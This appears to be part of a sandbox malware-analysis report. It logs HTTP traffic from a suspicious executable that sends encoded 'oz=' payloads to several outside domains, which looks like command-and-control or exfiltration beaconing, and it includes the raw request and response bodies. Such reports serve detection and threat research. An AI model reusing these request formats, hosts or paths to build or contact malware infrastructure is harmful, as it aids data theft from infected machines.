                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 36 34 69 4e 7a 57 38 6a 59 62 4e 37 32 59 4e 77 58 76 36 65 31 31 38 46 70 57 37 2f 36 56 62 6c 67 6a 38 56 68 54 37 6a 36 47 6f 52 32 76 70 63 41 4d 50 75 73 34 46 68 6d 41 62 73 4e 57 49 5a 68 48 65 70 42 55 74 55 76 56 63 7a 6b 34 41 68 74 33 38 2f 4d 6b 72 48 48 7a 45 44 37 42 50 66 6f 65 33 4c 39 75 30 38 2b 77 4d 71 74 4b 6c 34 56 33 46 34 76 76 6f 61 31 68 52 56 7a 70 4d 4b 51 42 6f 6c 73 42 50 57 76 74 5a 2b 77 54 6a 39 56 75 7a 34 4e 51 41 4b 58 44 7a 7a 4d 49 4e 63 4b 4d 6f 50 53 57 47 52 4e 71 77 2b 6a 4f 44 36 68 6c 77 6a 54 56 69 33 58 50 63 4b 4c 39 31 4e 79 66 4e 53 6a 5a 35 2b 42 6f 63 35 5a 59 6c 69 37 53 6b 76 36 70 63 3d
                                                                                                                                              Data Ascii: oz=64iNzW8jYbN72YNwXv6e118FpW7/6Vblgj8VhT7j6GoR2vpcAMPus4FhmAbsNWIZhHepBUtUvVczk4Aht38/MkrHHzED7BPfoe3L9u08+wMqtKl4V3F4vvoa1hRVzpMKQBolsBPWvtZ+wTj9Vuz4NQAKXDzzMINcKMoPSWGRNqw+jOD6hlwjTVi3XPcKL91NyfNSjZ5+Boc5ZYli7Skv6pc=


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              36192.168.11.20497663.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:13.562974930 CEST1289OUTPOST /qo4k/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.platinumkitchens.info
                                                                                                                                              Origin: http://www.platinumkitchens.info
                                                                                                                                              Referer: http://www.platinumkitchens.info/qo4k/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 36 34 69 4e 7a 57 38 6a 59 62 4e 37 32 59 4e 77 58 76 36 65 31 31 38 46 70 57 37 2f 36 56 62 6c 67 6a 38 56 68 54 37 6a 36 47 77 52 32 2b 4a 63 42 76 6e 75 74 34 46 68 70 51 62 74 4e 57 49 41 68 48 47 6c 42 55 68 45 76 58 55 7a 6c 61 34 68 36 57 38 2f 58 30 72 48 61 44 45 41 30 68 4f 48 6f 65 6e 48 39 71 55 38 2b 77 4d 71 74 4a 39 34 42 32 46 34 38 2f 6f 5a 79 68 52 6e 6b 35 4e 74 51 42 41 66 73 42 43 72 6f 63 6c 2b 31 41 62 39 47 6f 66 34 43 51 41 79 57 44 7a 72 4d 49 41 47 4b 4e 45 44 53 58 69 37 4e 74 55 2b 67 2f 79 79 34 57 38 6c 41 57 6d 6c 65 2b 6b 39 46 66 78 30 73 2f 46 54 76 4a 6c 43 4d 74 77 4a 53 70 56 50 69 69 78 76 6c 76 31 30 47 58 50 55 61 58 6f 50 77 48 6a 55 4a 50 35 32 71 65 59 5a 78 7a 55 45 30 50 2b 4f 59 59 69 61 63 49 67 72 57 6c 68 71 48 49 5a 77 52 55 79 4b 35 46 66 76 65 39 50 65 4d 48 51 51 67 79 44 4e 6c 44 46 4b 43 64 6c 6d 73 79 46 4b 6d 51 39 38 51 53 6d 64 63 67 43 63 6d 6a 32 6f 35 71 47 66 67 55 37 4b 47 78 6f 77 51 69 70 56 35 32 68 73 2f 36 58 41 6a 56 54 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=64iNzW8jYbN72YNwXv6e118FpW7/6Vblgj8VhT7j6GwR2+JcBvnut4FhpQbtNWIAhHGlBUhEvXUzla4h6W8/X0rHaDEA0hOHoenH9qU8+wMqtJ94B2F48/oZyhRnk5NtQBAfsBCrocl+1Ab9Gof4CQAyWDzrMIAGKNEDSXi7NtU+g/yy4W8lAWmle+k9Ffx0s/FTvJlCMtwJSpVPiixvlv10GXPUaXoPwHjUJP52qeYZxzUE0P+OYYiacIgrWlhqHIZwRUyK5Ffve9PeMHQQgyDNlDFKCdlmsyFKmQ98QSmdcgCcmj2o5qGfgU7KGxowQipV52hs/6XAjVT4v3+VyjI1utNI3zk/NqLCwi4AJvDeWRwrzudDX2ijOtgLneMDwgsrS3dxCyEkr7se7jvIJWgErmR17ni2vXQnoRwoPObF6hLG9E4BXP3S+HVSud3ddmfJS8nEgjSO/+/qNowp8ENtoCLMdUSbwFAtOD/7hRTRjnVr4VlAFz6KDFe3G7B7Rh0OlbvM988GzJq0avhWgWeU6peEr+IK9pCnQCbz/Ses5Tj1y58jOubsqmZi22V2NJ8ZffQ0xeC+UIFOHd5tZ6kS8NeEEATVJZa9sb/aS9SiIQFG2WLZ8njkZbADaDvXU8VDOhVAsW
                                                                                                                                              Oct 4, 2024 08:09:13.563021898 CEST1289OUTData Raw: 63 45 45 51 58 44 4d 33 2b 67 52 5a 70 71 32 46 77 63 68 4a 53 4c 6f 48 64 5a 6e 33 43 35 62 56 4e 34 73 45 46 55 72 2b 35 43 33 6f 45 6a 48 68 59 72 63 4f 30 6b 4a 4d 58 2f 62 49 63 2b 44 6f 61 54 4d 39 4b 37 4b 2f 74 66 48 79 4b 4c 62 41 66 41
                                                                                                                                              Data Ascii: cEEQXDM3+gRZpq2FwchJSLoHdZn3C5bVN4sEFUr+5C3oEjHhYrcO0kJMX/bIc+DoaTM9K7K/tfHyKLbAfAsoduVF6BAfa46v5gdpwNBQa4blZey/CECRiBLc1/SZUKP3yjLlCI7chNc1K9ZUEKb/+Jc8MCu+gcLXU5qJFt8q0ErPXNjm38BQEzjQPcYboCBKKpM2xE7LhFx48kwO2EUmCLGS4J0/WeT2zhENUHLKUHBYEnqgEnB
                                                                                                                                              Oct 4, 2024 08:09:13.563071966 CEST5156OUTData Raw: 38 2b 46 74 55 47 32 49 51 42 36 71 33 78 56 4d 66 2f 52 32 2b 77 6b 4f 72 59 64 61 43 39 74 55 50 41 4d 6e 66 48 69 62 51 31 2b 78 66 31 38 41 52 33 44 6a 74 54 57 57 68 39 57 41 54 54 30 49 58 7a 4f 56 4d 4d 69 61 41 59 64 5a 4b 41 2f 62 31 64
                                                                                                                                              Data Ascii: 8+FtUG2IQB6q3xVMf/R2+wkOrYdaC9tUPAMnfHibQ1+xf18AR3DjtTWWh9WATT0IXzOVMMiaAYdZKA/b1dsqJcBIQ+cYIu5UCEKlGJ+G4HogDp/t+qJjIVxuzhJrs3DW2DM74Y75Y0I+n0kL+34ZwYuzUG0uT1IdNQp/IDGX0I+zUlNvCjyYVCvR6U/7HiLdxX+VjPtsRQ6zeSxAxpi/MyzG5cJL0vuhla9xNOtiMsAo55q+Ny8
                                                                                                                                              Oct 4, 2024 08:09:13.563241005 CEST269OUTData Raw: 6b 4c 33 78 30 61 65 52 54 43 54 36 55 47 63 48 52 35 69 63 32 4e 2f 33 79 7a 6d 4a 69 6b 49 42 6e 6d 50 37 68 49 49 4e 6a 64 6c 50 5a 67 4b 52 4f 47 4d 63 4b 69 63 59 68 49 4b 69 42 6c 5a 4a 7a 52 4d 55 53 67 39 7a 5a 72 65 61 68 6a 6d 61 30 65
                                                                                                                                              Data Ascii: kL3x0aeRTCT6UGcHR5ic2N/3yzmJikIBnmP7hIINjdlPZgKROGMcKicYhIKiBlZJzRMUSg9zZreahjma0eqoZ4JT5q/g1SHo5LQnyWvyv50QI9fdTugCMaz6GOyROmZkpW3OhGRqlWcfvnUwv74Hiy/u7orZP3fQzDV8UX4oSj2/8V7xLqhoJ0gNZ+QIuEjBDEnOcR3405s7c/KVcOmJR7fJZvRAmAQwgjPKX3jxqhtxm+6Hos6


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              37192.168.11.20497673.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:16.201267004 CEST556OUTGET /qo4k/?oz=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.platinumkitchens.info
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:09:16.303719997 CEST399INHTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:09:16 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 7a 3d 33 36 4b 74 77 6a 49 44 61 66 6f 6d 79 39 74 71 4f 64 71 4e 77 6d 73 54 6e 30 4b 53 38 79 44 71 77 42 6f 54 30 54 6e 68 6d 57 4e 42 6d 72 63 57 41 35 37 6a 35 38 31 72 33 79 36 6c 53 33 59 70 78 6c 37 62 58 48 64 6b 34 57 68 53 33 4b 73 4e 7a 48 5a 62 58 31 4c 31 55 78 6f 4b 39 7a 4c 35 6c 75 75 51 72 63 4a 4d 39 69 41 6f 72 34 68 41 4c 41 4a 74 6f 4b 4d 3d 26 55 4a 39 3d 71 4e 2d 6c 6c 54 4b 50 48 78 6e 74 50 72 76 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              38192.168.11.20497683.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:21.528614044 CEST801OUTPOST /yyvd/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dhkatp.vip
                                                                                                                                              Origin: http://www.dhkatp.vip
                                                                                                                                              Referer: http://www.dhkatp.vip/yyvd/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 41 6f 30 70 43 43 45 68 30 56 4f 33 48 79 55 37 66 42 2f 7a 69 47 4a 51 37 75 64 58 38 2b 6b 63 38 6e 4a 79 32 4c 62 37 33 33 74 6f 37 70 55 70 32 39 31 5a 6d 43 49 43 6c 36 75 45 4b 61 42 71 64 47 79 62 59 33 73 65 4a 67 79 66 57 48 70 6a 39 35 6c 58 4e 62 39 77 2b 66 6c 36 44 7a 4e 4b 66 38 6b 66 68 67 59 43 66 46 5a 61 47 79 31 68 61 53 41 33 6b 74 61 68 6f 2f 79 34 34 4b 43 59 6b 47 41 4a 31 53 30 63 73 38 48 6b 54 6c 4f 4c 58 71 53 44 33 2b 54 44 74 61 55 66 74 79 53 64 79 30 73 6b 2b 54 66 48 48 62 50 71 39 79 75 2f 4c 71 69 4d 59 7a 6c 57 61 68 31 34 6a 35 54 6a 34 77 3d 3d
                                                                                                                                              Data Ascii: oz=Ao0pCCEh0VO3HyU7fB/ziGJQ7udX8+kc8nJy2Lb733to7pUp291ZmCICl6uEKaBqdGybY3seJgyfWHpj95lXNb9w+fl6DzNKf8kfhgYCfFZaGy1haSA3ktaho/y44KCYkGAJ1S0cs8HkTlOLXqSD3+TDtaUftySdy0sk+TfHHbPq9yu/LqiMYzlWah14j5Tj4w==


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              39192.168.11.20497693.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:24.154345989 CEST821OUTPOST /yyvd/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dhkatp.vip
                                                                                                                                              Origin: http://www.dhkatp.vip
                                                                                                                                              Referer: http://www.dhkatp.vip/yyvd/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 41 6f 30 70 43 43 45 68 30 56 4f 33 47 53 6b 37 50 53 6e 7a 6c 6d 4a 66 2b 75 64 58 33 65 6b 59 38 6e 46 79 32 50 4b 32 33 45 4a 6f 37 4a 6b 70 78 4d 31 5a 71 69 49 43 74 61 75 59 48 36 42 39 64 47 33 6b 59 79 4d 65 4a 6b 69 66 57 43 56 6a 39 76 74 55 4d 4c 39 75 31 2f 6c 43 65 44 4e 4b 66 38 6b 66 68 67 4d 6b 66 46 42 61 48 44 6c 68 62 32 30 30 6e 74 61 69 70 2f 79 34 70 61 44 77 6b 47 41 6e 31 54 6f 6d 73 36 44 6b 54 67 4b 4c 57 37 53 43 67 75 53 49 67 36 56 61 72 68 76 6a 70 42 78 53 34 55 76 4a 43 4a 36 57 78 45 2f 6c 57 59 57 6f 62 67 35 6b 65 52 4d 51 68 37 53 34 6c 7a 66 71 7a 48 36 49 45 75 57 4a 44 72 73 6c 71 74 58 66 6d 35 77 3d
                                                                                                                                              Data Ascii: oz=Ao0pCCEh0VO3GSk7PSnzlmJf+udX3ekY8nFy2PK23EJo7JkpxM1ZqiICtauYH6B9dG3kYyMeJkifWCVj9vtUML9u1/lCeDNKf8kfhgMkfFBaHDlhb200ntaip/y4paDwkGAn1Toms6DkTgKLW7SCguSIg6VarhvjpBxS4UvJCJ6WxE/lWYWobg5keRMQh7S4lzfqzH6IEuWJDrslqtXfm5w=


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              40192.168.11.20497703.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:26.796478033 CEST1289OUTPOST /yyvd/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dhkatp.vip
                                                                                                                                              Origin: http://www.dhkatp.vip
                                                                                                                                              Referer: http://www.dhkatp.vip/yyvd/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 41 6f 30 70 43 43 45 68 30 56 4f 33 47 53 6b 37 50 53 6e 7a 6c 6d 4a 66 2b 75 64 58 33 65 6b 59 38 6e 46 79 32 50 4b 32 33 45 42 6f 36 36 73 70 32 66 4e 5a 72 69 49 43 6e 36 75 62 48 36 41 2f 64 48 54 67 59 79 49 4f 4a 69 2b 66 45 77 4e 6a 70 4b 4e 55 48 4c 39 75 6f 76 6c 35 44 7a 4e 54 66 38 30 62 68 67 63 6b 66 46 42 61 48 42 4e 68 59 69 41 30 68 74 61 68 6f 2f 7a 33 34 4b 44 4c 6b 47 49 52 31 54 64 62 74 4c 2f 6b 53 41 61 4c 61 70 36 43 2f 65 53 4b 6c 36 56 38 72 68 6a 47 70 41 59 74 34 55 79 55 43 4f 47 57 37 43 47 39 52 70 71 55 59 53 77 75 43 52 42 6f 74 36 71 6f 6e 52 2f 56 2b 57 79 66 4f 5a 47 64 4b 59 4d 6c 76 4f 33 30 37 39 49 77 38 61 42 4b 6f 75 51 2b 4e 78 53 53 76 37 6f 4e 47 74 64 59 62 34 43 46 79 38 47 63 55 66 2b 6c 67 64 5a 37 45 73 2f 51 66 43 6a 6e 46 7a 70 45 36 7a 6d 57 4a 43 7a 53 34 4c 41 6a 57 6b 56 4c 5a 68 73 2f 4e 30 63 36 76 46 53 39 73 5a 69 54 33 58 71 31 76 42 61 78 57 72 50 2b 5a 38 47 4d 34 75 78 63 4b 41 36 52 49 41 68 4c 6a 65 34 56 52 58 41 4f 34 44 39 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=Ao0pCCEh0VO3GSk7PSnzlmJf+udX3ekY8nFy2PK23EBo66sp2fNZriICn6ubH6A/dHTgYyIOJi+fEwNjpKNUHL9uovl5DzNTf80bhgckfFBaHBNhYiA0htaho/z34KDLkGIR1TdbtL/kSAaLap6C/eSKl6V8rhjGpAYt4UyUCOGW7CG9RpqUYSwuCRBot6qonR/V+WyfOZGdKYMlvO3079Iw8aBKouQ+NxSSv7oNGtdYb4CFy8GcUf+lgdZ7Es/QfCjnFzpE6zmWJCzS4LAjWkVLZhs/N0c6vFS9sZiT3Xq1vBaxWrP+Z8GM4uxcKA6RIAhLje4VRXAO4D9kWTPBR07/BVebi1iUUbnYh8xwYnBrAgc2WWHcfNcUA3X/wJZt2vcAAFHNEGef/k+kDnX9GT6lppqfiYfGdi70NcwXY8DedkAU+i5qUUrWAyaLIwJsjgakZijy71x8BsqiFCEhul3POr9OBDCbarvidvhVnWbTX0xadEuHa9wCPpbO5fJBliycvkz3BcZZtDVgyY2+5IqhzWlFQ7S8ShlNrotv7P3bazgn9Z2JEz4pZQ9JFau8Cozgm3kfqUSyQqYUJh8SjoZCUZbFUhx9cAilEm8QS9vmZAPEfVhJUay1nEDn2YgsTL4tz7I3rQb+ivbMyrs7IvrZ/Aa+CHfqxvlaBlJPEaR
                                                                                                                                              Oct 4, 2024 08:09:26.796529055 CEST2578OUTData Raw: 53 7a 2f 54 6e 45 4f 62 56 79 56 65 62 5a 69 34 6f 59 59 4b 67 4f 61 38 41 63 6e 64 51 75 41 37 6c 33 63 31 6c 61 2f 4a 37 70 79 54 6a 37 77 2b 4e 31 77 66 49 49 4d 4b 73 68 6a 44 6d 6e 62 71 77 4d 6e 54 31 4c 48 38 31 37 73 6d 54 4c 53 4b 58 6e
                                                                                                                                              Data Ascii: Sz/TnEObVyVebZi4oYYKgOa8AcndQuA7l3c1la/J7pyTj7w+N1wfIIMKshjDmnbqwMnT1LH817smTLSKXnuiZUTbo8dh3dEnQxRXdTT9MNSasqSf9uBjDY0x6dkNM5ZwSnffUC0xt1MOCioOmP7AFpY3VviETWfoH2KhEQk+VQfQMWPVHEvsfdDixLl+vdfOdPX+AJlbRsAGQpe4r8uXbSMS1tG360nhxk0BT9MZ3mxWo+fULGq
                                                                                                                                              Oct 4, 2024 08:09:26.796576977 CEST4103OUTData Raw: 69 4f 70 48 35 45 39 6c 53 7a 6a 4b 48 68 35 6c 34 4a 39 41 7a 48 77 76 51 34 6d 7a 30 49 61 6b 57 62 4e 47 57 63 72 67 67 6d 34 48 74 37 4c 63 57 6f 74 6b 78 58 73 73 74 46 2f 4f 70 4b 30 38 44 30 44 70 35 4f 77 72 68 65 69 48 6a 35 46 4c 78 39
                                                                                                                                              Data Ascii: iOpH5E9lSzjKHh5l4J9AzHwvQ4mz0IakWbNGWcrggm4Ht7LcWotkxXsstF/OpK08D0Dp5OwrheiHj5FLx9ihgC07Jdti2P0WPrddrTkCEhZU6Ttlsr20jceGDCqRPVnwHgDEmEa2ATuqB0xiC82omBMwVEDqu7ey3/P9Ab/qqhTajPWS5wyOjQxrn4jZV17qHNoeEEL1UhhlAtc9yOOUuJji50noK8gEsnwZX8EcAsT/kUDDb46


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              41192.168.11.20497713.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:29.432348967 CEST545OUTGET /yyvd/?oz=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dhkatp.vip
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:09:36.586494923 CEST399INHTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:09:36 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 7a 3d 4e 71 63 4a 42 33 70 5a 7a 7a 69 63 48 31 67 37 4f 43 66 2b 6f 32 39 52 32 35 63 36 34 4f 63 38 75 45 52 64 6a 72 4f 6e 76 32 30 38 31 64 6b 71 68 35 64 62 79 69 78 69 31 49 57 64 52 38 68 6f 63 44 2f 70 43 48 45 75 4c 78 53 78 47 51 4a 55 6a 35 6f 4b 62 35 78 4a 37 39 45 68 42 68 5a 55 5a 63 38 59 73 78 78 37 59 45 67 6b 48 54 6c 43 57 57 4d 55 6b 37 6b 3d 26 55 4a 39 3d 71 4e 2d 6c 6c 54 4b 50 48 78 6e 74 50 72 76 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              42192.168.11.2049772103.21.221.4804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:09:42.061569929 CEST837OUTPOST /iydt/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.tempatmudisini01.click
                                                                                                                                              Origin: http://www.tempatmudisini01.click
                                                                                                                                              Referer: http://www.tempatmudisini01.click/iydt/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 4f 63 48 4c 71 62 47 63 44 59 45 4b 72 43 4e 57 52 41 61 72 77 58 48 74 44 34 6b 6d 50 4f 51 31 68 35 4d 75 65 55 79 67 36 30 49 43 50 4f 37 30 69 56 6f 57 43 49 74 45 74 75 38 49 69 56 70 36 41 79 74 32 77 2f 66 4d 77 4e 4f 2b 34 34 73 35 4b 63 72 73 4d 6f 5a 78 45 74 6a 50 4c 35 55 6c 59 4f 42 4a 42 79 6c 4e 75 72 67 52 30 6a 6e 34 7a 6d 42 6d 75 32 50 52 6a 64 36 63 68 38 30 36 76 52 4b 79 64 6e 62 31 50 41 59 57 5a 73 47 77 53 61 5a 71 4e 45 59 4a 7a 58 75 41 68 7a 4b 42 47 37 51 30 64 4f 2f 6d 31 57 4f 58 4e 47 57 43 75 38 46 6c 6a 50 6f 44 6c 51 56 70 5a 42 36 33 66 67 3d 3d
                                                                                                                                              Data Ascii: oz=OcHLqbGcDYEKrCNWRAarwXHtD4kmPOQ1h5MueUyg60ICPO70iVoWCItEtu8IiVp6Ayt2w/fMwNO+44s5KcrsMoZxEtjPL5UlYOBJBylNurgR0jn4zmBmu2PRjd6ch806vRKydnb1PAYWZsGwSaZqNEYJzXuAhzKBG7Q0dO/m1WOXNGWCu8FljPoDlQVpZB63fg==
                                                                                                                                              Oct 4, 2024 08:09:42.768088102 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                              Connection: close
                                                                                                                                              x-powered-by: PHP/7.4.33
                                                                                                                                              x-litespeed-tag: 894_HTTP.404
                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                              link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                                                                              x-litespeed-cache-control: no-cache
                                                                                                                                              cache-control: no-cache, no-store, must-revalidate, max-age=0
